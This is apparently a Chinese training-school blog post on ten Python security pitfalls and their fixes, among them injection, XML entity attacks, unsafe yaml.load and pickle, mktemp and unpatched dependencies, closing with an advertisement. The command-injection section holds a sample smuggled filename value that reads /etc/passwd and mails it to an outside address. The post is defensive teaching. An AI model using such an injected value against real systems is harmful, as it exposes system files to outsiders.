千锋扣丁学堂Python培训之十个安全

今天千锋扣丁学堂Python培训老师给大家分享一篇关于初学者学习Python中的10个安全漏洞以及如何修复漏洞的方法。比如在写代码的过程中，我们的总会遇见各式各样的大坑小坑。Python也不例外，在使用模块或框架时，也存在着许多糟糕的实例。然而，许多Python开发人员却根本不知道这些。

1.输入注入

注入攻击是最广泛的，注入的种类又很多种，它们影响所有的语言、框架和环境。

SQL注入是直接编写SQL查询时将字符串与变量混合。有一种“引号字符转义”被认为是一种修复，但并非如此，可以通过查看SQL注入所有可能发生的方式。

命令注入有可能在使用popen、subprocess、os.system调用一个进程并从变量中获取参数时发生，当调用本地命令时，有人可能会将某些值设置为恶意值。

攻击者会将filename的值设置为“;cat/etc/passwd|mailthem@domain.com或者其他同样危险的值。

修复方法：

如果你使用了Web框架，可以用附带的实用程序对输入进行清理，除非有充分的理由，否则不要手动构建SQL查询，大多数ORM都有内置的清理方法。

对于shell，可以使用shlex模块正确地转义输入。

2.解析XML

如果您的应用程序加载并解析XML文件，可能您正在使用一个XML标准库模块。有一些针对XML的常见攻击。大多数为DoS风格（旨破坏系统而不是盗取数据）。这些攻击很常见，特别是在解析外部（即不可信任的）XML文件时。

其中一种攻击为“billionlaughs”，因为加载的文件包含了很多个（数十亿）“lols”。你可以加载XML实体文件，当XML解析器试图将这个XML文件加载到内存中时，会消耗很多个G的内存。

另一种攻击使用外部实体扩展。XML支持从外部URL引用实体，XML解析器通常会直接获取并加载该资源。“攻击者可以绕开防火墙访问保密资源，因为所有请求都是由内部可信的IP地址创建的，请求不是来自于外部。”

需要考虑的另一种情况是您要依赖于第三方软件包来解码XML，例如配置文件，远程API。您甚至不知道您的某个依赖包已经暴露在攻击之下。

那么在Python中会发生什么？标准库模块etree，DOM，xmlrpc都容易遭受这些类型的攻击。

修复方法：

直接用defusedxml替换标准库模块。它增加了针对这类攻击的安全防护。

3.Assert语句

不要使用assert语句来防止用户访问特定代码段。例如：

默认的情况下，Python以debug为true来执行脚本，但在真实环境中，通常使用优化运行，这将会跳过assert语句并直接转到安全代码，而不管用户是否是is_admin。

修复方法：

仅在单元测试中使用assert语句。

4.计时攻击

计时攻击本质上是一种通过计算比较提供值所需时间来暴露行为和算法的方式。计时攻击需要精确性，所以通常不能用于高延迟的远程网络。由于大多数Web应用程序涉及可变延迟，因此几乎不可能针对HTTPWeb服务器编写计时攻击。

但是，如果你的应用程序有提示输入密码的命令行，攻击者就可以编写一个简单的脚本来计算将其值与实际密码进行比较所需的时间。

修复方法：

使用在Python3.5中引入的secrets.compare_digest来比较密码和其他私密值。

5.感染site-packages或导入路径

Python的导入系统非常灵活。当你为测试程序编写猴子补丁，或者重载核心函数时，你会感觉非常方便。

但这也是Python最大的安全漏洞之一。

将第三方包安装到site-packages中，无论是在虚拟环境中还是在全局site-packages中，你都将暴露在安全风险中。

有一些发布到PyPi的包与流行的包具有相似的名称，但是却执行了任意代码。幸运的是，这很可能没有太大危害，只会“明确表示”这个问题没有得到真正的解决。

需要考虑的另一种情况是多层依赖包。它们可能包含漏洞，它们也可以通过导入系统重写Python默认行为。

修复方法：

你可以利用PyUp.io这个网站提供的工具检查你的第三方包。使用虚拟环境，确保您的全局site-packages尽可能干净。检查包签名。

6.临时文件

要在Python中创建临时文件，你通常会使用mktemp()函数生成一个文件名，然后使用该名称创建一个文件。“这是不安全的，因为另一个进程可能会在调用mktemp()和随后尝试通过第一个进程创建文件之间的空隙创建一个同名文件。”这意味着应用程序可能加载错误的数据或暴露其他的临时数据。

如果调用不正确，最新版本的Python会发出运行警告。

修复方法：

如果需要生成临时文件，请使用tempfile模块并使用mkstemp。

7.使用yaml.load

这里引用PyYAML的说明文档：

警告：使用不可信源的数据调用yaml.load是不安全的！yaml.load和pickle.load一样强大，所以可以调用任何Python函数。

在流行的Python项目Ansible中找到的这样一个例子（链接：https://www.talosintelligence...），你可以将此值提供给AnsibleVault作为（有效的）YAML，它使用文件中提供的参数调用os.system。

所以，从用户提供的值中加载YAML文件会让应用大门洞开，很容易遭受攻击。

修复方法：

总是使用yaml.safe_load，除非你有其它更好的方法。

8.Pickle漏洞

用pickle反序列化数据和YAML一样糟糕。在pickle对象时，Python类可以声明一个名为reduce的魔术方法，该方法返回一个字符串、或一个元组。攻击者可以使用它来引用其中一个子进程模块，在主机上运行任意命令。

修复方法：

切勿用pickle反序列化不受信任或未经身份验证的数据。改用另一种序列化模式，如JSON。

9.使用系统自带的Python而不修补漏洞

大多数可移植操作系统都自带Python2，通常还是旧版本。

由于“Python”，即CPython是用C语言编写的，所以Python解释器本身存在漏洞。C语言中常见的安全问题与内存分配有关，所以存在缓冲区溢出错误。

多年来CPython出现了多个溢出漏洞，每个漏洞都在后续版本中进行了修复。

也就是说，如果你修补了Python本身的漏洞，你就是安全的。

修复方法：

安装最新版本的Python并及时修补漏洞。

10.不修补依赖包的漏洞

类似于修补Python本身的漏洞，您还需要定期修补依赖包漏洞。有人习惯于使用PyPi软件包的“固定”版本，这种做法很可怕。他们认为“这些是有用的版本”，所以每个人都对漏洞置若罔闻。

上面提到的所有漏洞如果存在于你使用的包中，它们同样很致命。这些软件包的开发人员无时不刻不在解决安全问题。

修复方法：

使用类似于PyUP.io这个网站提供的服务去检查更新，向应用程序发送pull/merge请求，运行测试，让软件包保持更新。

以上就是关于千锋扣丁学堂Python培训之十个安全漏洞和修复漏洞方法的全部内容，希望对小伙伴们有所帮助，想要了解更多内容的小伙伴可以登录扣丁学堂官网咨询。想要学好Python开发小编给大家推荐口碑良好的扣丁学堂，扣丁学堂有专业老师制定的Python学习路线图辅助学员学习，此外还有与时俱进的Python课程体系和Python视频教程供大家学习，想要学好Python开发技术的小伙伴快快行动吧。扣丁学堂Python技术交流群：279521237。